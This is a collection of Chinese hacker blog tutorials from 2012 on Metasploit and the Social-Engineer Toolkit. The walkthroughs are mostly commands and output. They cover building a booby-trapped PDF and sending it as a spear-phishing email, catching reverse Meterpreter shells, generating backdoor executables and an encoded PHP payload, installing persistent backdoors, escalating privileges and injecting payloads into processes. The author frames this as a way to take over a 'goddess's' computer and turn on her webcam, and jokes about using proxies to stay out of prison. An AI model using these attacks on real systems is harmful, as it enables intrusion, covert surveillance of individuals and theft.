【专业技巧】可怕的社会工程学 第一季

建议大家购买主页君状态提及的《metasploit渗透测试指南》中文版,亚马逊上有。不是广告,主页君又拿不到提成=。= 只是这本书对于初级脚本小子(绝大多数中国黑客水平)来说是迈向专业级黑客很不错的第一步。

至于要花钱这种事情,我会告诉你metasploit pro貌似要几千块吗?什么爱好都是要付出代价的,就像我们大多数用虚拟机装BackTrack的得去额外购买一张外置网卡一样。

介绍几点常识(如果你是有一定渗透基础的,可以直接跳过):

1°除了一部分社工,所有的入侵全部依靠漏洞。大部分社工也需要依赖漏洞。苍蝇不叮无缝的蛋,生活不是小说,黑客也不是传奇————至少绝大部分不是。小说中的传奇黑客并不是一个不能达到的高度:只要你掌握了超前整个时代5~10年的漏洞,你就是传奇。即使是这样,也很难出现随便接个网线开台电脑就能入侵的情况————没有工具啊。我们所需的工具再简单,也有几十几百行,临时编工具编死你。

2°实际上掌握一两个excellent级别的未公布的漏洞,你就会觉得很多主机脆弱的像处女膜。如果这几个漏洞是你自己发掘的,那恭喜你你已经可以向安全公司投简历了。

3°wooyun上经常公布一些漏洞,但那些漏洞即使rank值很高,绝大部分也只是高针对性应用面极窄的漏洞。而且绝大部分得归结于管理员的疏忽————这些不是上文所说的广泛性漏洞。

4°除非你真掌握了超前于时代的漏洞(肯定有人有组织掌握着这样的昂贵的漏洞),否则最恐怖的一定是社工————社会工程学。中国的黑客圈子经常讲的钓鱼,就是社工的一种。社工是很广泛的一个技巧,绝不像有些菜鸟们理解的猜密码猜密保什么的。

正文开始。
我讲的是我理解的社工,一家之言,若和网络上介绍的不同,请一笑而过。
原创 by 猪头

我讲的社工建立在BackTrack平台上,主要是讲社会工程工具包(SET)。这个工具包安装在/pentest/exploits/SET 目录下。

一:群发钓鱼邮件。

听起来很不道德而且不容易让人上当,对吧?实际情况恰恰相反。2010年,包括谷歌公司在内的很多家大型公司沦陷于极光“Aurora”攻击事件,就是因为这样的攻击。

现在大家的警惕性都足以让大家不会去点击来历不明的邮件里的莫名链接,更不会把邮件里面的可执行文件下载运行。更何况电脑的杀毒软件和防火墙又不是吃素的。但这些并不代表你就安全了。

利用漏洞:特殊构造的文件格式漏洞渗透攻击;
案例:使用Adobe PDF漏洞。

注册一个类似于公司的域名,如companyxyz.com,或者注册一个子域名。然后对于目标发送一些有针对性的邮件。比如,谷歌公司负责对外客户交涉的一些部门人员就不大可能拒绝阅读一封看起来像某家公司发过来的邮件,更何况内容合理,附带的是一封PDF文本,没有任何异常。然后,顺理成章的,打开邮件里的pdf,成功溢出,初步渗透成功。
钓鱼邮件生成发送方法:
————————————————————————————
root@bt:/pentest/exploits/set# ./set

Select from the menu:

1. Spear-Phishing Attack Vectors (*)
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Wireless Access Point Attack Vector
9. Third Party Modules138 Chapter 10
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
13. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure “Sendmail” is installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack (*)
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1

Select the file format exploit you want.

The default is the PDF embedded EXE.
********** PAYLOADS **********

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. SET Custom Written Document UNC LM SMB Capture Attack
3. Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4. Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5. Adobe Flash Player ‘Button’ Remote Code Execution
6. Adobe CoolType SING Table ‘uniqueName’ Overflow
7. Adobe Flash Player ‘newfunction’ Invalid Pointer Use
Z 8. Adobe Collab.collectEmailInfo Buffer Overflow (*)
9. Adobe Collab.getIcon Buffer Overflow
10. Adobe JBIG2Decode Memory Corruption Exploit
11. Adobe PDF Embedded EXE Social Engineering
12. Adobe util.printf() Buffer Overflow
13. Custom EXE to VBA (sent via RAR) (RAR required)
14. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15. Adobe PDF Embedded EXE Social Engineering (NOJS)
16. Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17. Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

Enter the number you want (press enter for default): 8

1. Windows Reverse TCP Shel Spawn a command shell on victim and send back to
attacker.
2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back
to attacker.The Social-Engineer Toolkit 139
3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to
attacker.
4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64),
Meterpreter
6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on
remote system.
7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter.

[ Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443…
[*] Generating fileformat exploit…
[*] Please wait while we load the module tree…
[*] Started reverse handler on 10.10.1.112:443
[*] Creating ‘template.pdf’ file…
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of ‘template.whatever’
Do you want to rename the file?
example Enter the new filename: moo.pdf

1. Keep the filename, I don’t care. (*)
2. Rename the file, I want to be cool.
Enter your choice (enter for default): 1
Keeping the filename and moving on.
———————————————————————————
上面就是生成“问题”PDF的过程。打(*)为我们选择的选项。当然你可以按情况和需要进行更改,比如PDF的文件名可以改成“爱一次伤一生的三个星座.pdf” = =

下面设置你要发送的对象:

————————————————————————————
Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1

Below is a list of available templates:
1: New Update
2: Computer Issue
3: Strange internet usage from your computer
4: LOL…have to check this out…
5: Status Report
6: Pay Raise Application Form
7: WOAAAA!!!!!!!!!! This is crazy…
8: BasketBall Tickets
9: Baby Pics
10: Have you seen this?
11: Termination List
12: How long has it been?
13: Dan Brown’s Angels & Demons

Enter the number you want to use: 5

[ Enter who you want to send email to: ihazomgsecurity@secmaniac.com

What option do you want to use?
1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1

\ Enter your GMAIL email address: fakeemailaddy@gmail.com

Enter your password for gmail (it will not be displayed back to you):

SET has finished delivering the emails
———————————————————————————
我们这次的攻击针对单一邮件地址,将先前生成的pdf作为附件,发送出可爱的极具欺骗性的邮件。这个邮件可能将让你得以成功控制你女神的电脑,然后打开她的摄像头。说不定能看到些什么呢XD

最后一步,创建Metasploit监听端口用来监听攻击载荷反弹连接。(PS:由于是反弹连接,所以是被攻击者主动向攻击者发起连接,所以你现在理解了为什么我说大部分防火墙和杀毒软件不会起作用了吧——你主动去连别人,一般的防火墙怎么会阻止你)
———————————————————————————
Do you want to setup a listener yes or no: yes

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 10.10.1.112
LHOST => 10.10.1.112
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler…
msf exploit(handler) >
————————————————————————————————————————————————

当对方打开你的pdf文件后,按下面的操作,你这边的显示会是这样的:
———————————————————————————
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler…
msf exploit(handler) > [*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58087)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > shell
Process 2976 created.
Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Bob\Desktop>
———————————————————————————
看到最后没有,已经不是BackTrack的linux命令行界面了,而是XP的伪DOS界面了。你已经获得了对方的shell。下面you can do everything.

(PS:善于使用代理和跳板将极大地延长你在监狱外面的时间)

今天就写到这里吧,主页君好困啊呜呜呜,这是第一种专业社工,下面会持续更新的哦^_^

对了主页君忘了讲类似于猜解密码的前置社工了T^T 下次更新的时候尽量补上吧,下次更新可能是9号下午= =主页君要期末考了啊断更了别怪我。。。不过不会太监的~\(≧▽≦)/~啦啦啦

猪头 于2012.5.9凌晨
转载请注明来源http://page.renren.com/601190241/note/844956388

msfmap和scheduleme

最近在研究meterpreter,发现这个msfmap,给力啊。虽然还有和他差不多的,但………………

https://msfmap.googlecode.com/files/MSFMap-v0.1.1.tar.bz2
这是下载地址。
如何安装?
寻找你MSF所在,windows的你自己知道路径。BT5的一般在
/opt/metasploit/msf3
/pentest/exploits/framework3
我的是在第一个,大部分都应该一样。

给install.sh 加运行权限
然后输入
./install.sh /opt/metasploit/msf3
安装到msf3中。

加载msfmap,load msfmap
msfmap和nmap差不多。(其实差很多)

meterpreter > load msfmap
Loading extension msfmap…success.
meterpreter > msfmap -PN 192.168.0.1/24

Starting MSFMap 0.1.1
MSFMap scan report for 192.168.0.1
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.100
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.101
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.103
Host is up.
Not shown: 97 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
6001/tcp open  X11:1

MSFMap scan report for 192.168.0.104
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.105
Host is up.
Not shown: 98 closed ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

MSFMap scan report for 192.168.0.107
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.108
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.111
Host is up.
Not shown: 95 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-term-serv

MSFMap done: 256 IP address (9 hosts up) scanned in 57.54 seconds

meterpreter >

由于我家 宽带用的人较多。所以这不是重点。。。。。。。。。。。。。。。请忽略。/

meterpreter > msfmap -h
MSFMap (v0.1.1) Meterpreter Base Port Scanner
Usage: msfmap [Options] {target specification}

OPTIONS:

–top-ports <opt>  Scan <number> most common ports
-PN                Treat all hosts as online — skip host discovery
-T<0-5>            Set timing template (higher is faster)
-h                 Print this help summary page.
-oN         <opt>  Output scan in normal format to the given filename.
-p          <opt>  Only scan specified ports
-sP                Ping Scan – go no further than determining if host is online
-sS                TCP Syn scan
-sT                TCP Connect() scan
-v                 Increase verbosity level

上面参数好像就前两个可以用????  后面测试 全失败。不知道什么原因。
meterpreter > msfmap 192.168.0.100-120  这个也可以用。
这个扫描有点问题。不怎么准确。在找出nmap能加载进meterpreter时,暂时用这个。
———————————————————————————————————
meterpreter > run scheduleme -h
Scheduleme — provides most common scheduling types used during a pentest
This script can upload a given executable or script and schedule it to be
executed. All scheduled task are run as System so the Meterpreter process
must be System or local admin for local schedules and Administrator for
remote schedules

OPTIONS:

-c  <opt>  Command to execute at the given time. If options for execution needed use double quotes
-d         Daily.
-e  <opt>  Executable or script to upload to target host, will not work with remote schedule
-h         Help menu.
-hr <opt>  Every specified hours 1-23.
-i         Run command imediatly and only once.
-l         When a user logs on.
-m  <opt>  Every specified amount of minutes 1-1439
-o  <opt>  Options for executable when upload method used
-p         Password for account provided.
-r         Remote Schedule. Executable has to be already on remote target
-s         At system startup.
-t  <opt>  Remote system to schedule job.
-u         Username of account with administrative privelages.

run scheduleme -e /root/2222.exe -l

-s -i 参数都接不到sessions。
-l却可以。

上传个后门相当于永久会话。只要他有用户登录,都可以获得会话。超级给力。传个穿墙的上去,你懂的。

from  :  http://hi.baidu.com/67115248/item/085f9cd043b59b58fa576871

Meterpreter提权命令getsystem

Metasploit作为全宇宙最好的渗透Framework在我手里算是废了,当初选择用它还主要是因为EXPLOIT-DB上的很多Exploit都是以Metasploit脚本形式给出。而我一般运行过脚本文件,用Wireshark抓包得到POC后就不怎么用了,所以它很多神奇犀利的工具都没有仔细研究过。

 

今天跑一个CVE-2009-3867的Exploit,无意中在Payload里面选中了

 

 

Exploit成功后提示建立起了一个Meterpreter Session

 

 

之后就可以在Meterpreter交互窗口里利用反弹回的Shell和VM进行通信,在交互窗口里输入”help”可以查看这个Shell提供的命令:

 

 

 

其中一个getsystem命令看上去非常诱惑——

 

 

用Google了一番,在一份Offsensive-Security官方教程里找到了这个命令的使用方法:

 

 

运行getsystem之前,用getuid查看当前的用户名:

 

 

运行getsystem,提示提权成功后再用getuid查看当前用户名:

 

 

继续Google了一番,了解到getsystem命令可以提供四种提权方式。每一种提权都得通过Exploit一个系统漏洞来实现。当然都是比较老的漏洞,前三个都是MS09—XX级别的;最新的一个是MS10-015

 

msf3\external\source\meterpreter\source\elevator目录下有这四种不同提权方式的实现源码,其实也就是其所借助漏洞的利用代码;有时间还是可以好好研究一下的

 

 

from :  hi.baidu.com/kk

 

 

P.S:51CTO 非常贴心得提供了《Metasploit-Tthe Pentration Tester’s Guide》的电子版下载

Metasploit BackDoor For Windows

Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试,shellcode 编写和漏洞研究提供了一个可靠平台。
这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的 MSF 包含了750多种流行的操作系统及应用软件的漏洞,以及N个 shellcode 。作为安全工具,它在安全检测中用着不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供了有力保障。
同时他也提供了多种后门的方式,现在我们简单的了解他

msfpayload as shellcode

查看全部列表 目前有:248 蛋

1
root@Dis9Team:/home/brk# msfpayload -l
root@Dis9Team:/home/brk# msfpayload -l


他能生成多种多样的
简单的来说一个

正常的Windows后门

:用的是:windows/meterpreter/reverse_tcp

1
2
msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
  msfencode -b '' -t exe -o /var/www/meterpreter.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
  msfencode -b '' -t exe -o /var/www/meterpreter.exe


生成以后让目标运行 我们需要进行监听,或者SHELL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > exploit 

[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800

meterpreter >
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > exploit 

[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800

meterpreter >

其他(php asp jsp dll)

选中你的msfpayload名字,生成,你动的 例如:
Dll:


参考: The DLL Hijacking Tutorial
php:

1
2
 msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
 msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

JAVA:

1
 ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar
 ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar

 

不正常的Windows后门

说到正常的肯定有不正常的 例如:reverse_https reverse_http
大家都晓得 这东西秒杀防火墙的,在生成的过程中,党意外中断的链接我们可以再继续链接,就像灰鸽子一样,默认是5分钟,你可以设置SessionExpirationTimeout选项为0,代表链接永远不会过期。

1
2
3
brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

现在我们来运行他。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 1111
LPORT => 1111
msf  exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf  exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 1111
LPORT => 1111
msf  exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf  exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800

成功了,多点了一下 两个SHELL 我们吧SHELL绘画删除了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
msf  exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf  exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf  exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf  exploit(handler) > sessions 

Active sessions
===============

No active sessions.

msf  exploit(handler) >
msf  exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf  exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf  exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf  exploit(handler) > sessions 

Active sessions
===============

No active sessions.

msf  exploit(handler) >

继续监听:

1
2
3
4
5
6
7
8
9
10
11
12
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800

继续获得了SHELL

persistence

这货是POST EXPLOITS模块的,前提你要有SHELL绘画,创建持续的后门,作为系统服务器启动
先来链接SHELL,查看帮助先:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf  exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >
msf  exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >

下面我们来运行:

1
2
3
4
5
6
7
8
9
10
11
meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >
meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >

安装到了 c:\windows 每隔5秒监听端口1234,本机是5.5.5.1
下面我们看看目标机子有什么情况:

多了几个VBS,这就是木马鸟,当我们重启或者登录的时候,他会自动运行,如何删除后么?

1
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc

运行他

1
2
3
meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs
meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs

payload inject

射入其他payload。。 例如:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
msf  exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf  post(payload_inject) >
msf  post(payload_inject) > show options 

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION                                   yes       The session to run this module on.

msf  post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  post(payload_inject) > set LPORT 9999
LPORT => 9999
msf  post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf  post(payload_inject) > set SESSION 5
SESSION => 5
msf  post(payload_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 1636
[*] Post module execution completed
msf  post(payload_inject) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
